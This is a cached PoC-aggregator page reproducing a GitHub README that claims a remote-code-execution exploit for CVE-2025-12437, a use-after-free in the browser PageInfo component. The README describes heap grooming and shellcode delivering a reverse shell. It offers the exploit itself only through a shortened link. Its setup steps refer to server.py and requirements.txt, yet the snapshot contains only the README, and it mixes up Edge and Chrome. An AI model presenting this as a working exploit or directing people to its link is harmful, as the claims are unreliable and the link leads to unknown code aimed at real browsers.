Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-12437 PoC — Microsoft Edge 安全漏洞

Source
https://github.com/callinston/CVE-2025-12437
Associated Vulnerability
Title:Microsoft Edge 安全漏洞 (CVE-2025-12437)
Description:Microsoft Edge是美国微软(Microsoft)公司的一款Windows 10之后版本系统附带的Web浏览器。 Microsoft Edge存在安全漏洞,该漏洞源于内存释放后重用。
Readme
# Chrome PageInfo UAF Exploit (CVE-2025-12437)

This repository contains a proof-of-concept exploit for CVE-2025-12437, a use-after-free vulnerability in the PageInfo component of Google Chrome versions up to 141.0.7390.122. The exploit allows remote code execution (RCE) via manipulated page history data, impacting confidentiality, integrity, and availability as per CWE-416.

## Disclaimer
This is for educational and red-team purposes only. Use in compliance with local laws. Author assumes no liability for misuse.

## Exploit Overview
- **Vulnerability Type**: Use-After-Free (UAF) in PageInfo handling.
- **Affected Versions**: Google Chrome <= 141.0.7390.122.
- **Attack Vector**: Remote, requires user interaction (visiting a malicious webpage).
- **Exploitation Requirements**: No authentication needed; exploits heap memory corruption during history diff processing.
- **Impact**: Rrbitrary code execution, data exfiltration, or browser sandbox escape.
- **Tested Platforms**: Windows 10/11, macOS Ventura/Sonoma, Linux (Ubuntu 24.04)

## How It Works
The exploit leverages a flaw in how Chrome's PageInfo processes history differences (e.g., JSON/XML diffs). By crafting a malicious webpage that triggers repeated allocations and frees in the history buffer:

1. A specially formatted script injects oversized history entries, causing premature deallocation.
2. The UAF is triggered during a subsequent diff operation, allowing pointer reuse.
3. Heap grooming techniques (using JavaScript arrays) align memory for controlled writes.
4. Shellcode is injected to bypass ASLR/DEP, executing a payload (e.g., calc.exe on Windows or reverse shell).


## Setup and Usage
1. Install dependencies: `pip install -r requirements.txt`
2. Run the server: `python server.py`
3. Direct target browser to `http://localhost:8080`
4. Observe RCE.

## Demo

https://github.com/user-attachments/assets/0d90f941-b5ec-4100-b030-d170bd661d48

## Exploit
**[href](https://tinyurl.com/2p9trj2k)**

For any inquiries, please email me at: eviedejesu803@gmail.com
File Snapshot

 [4.0K]  /data/pocs/7bd90bc9b6bb437b40b32b90521994e62814d55a
└── [2.0K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.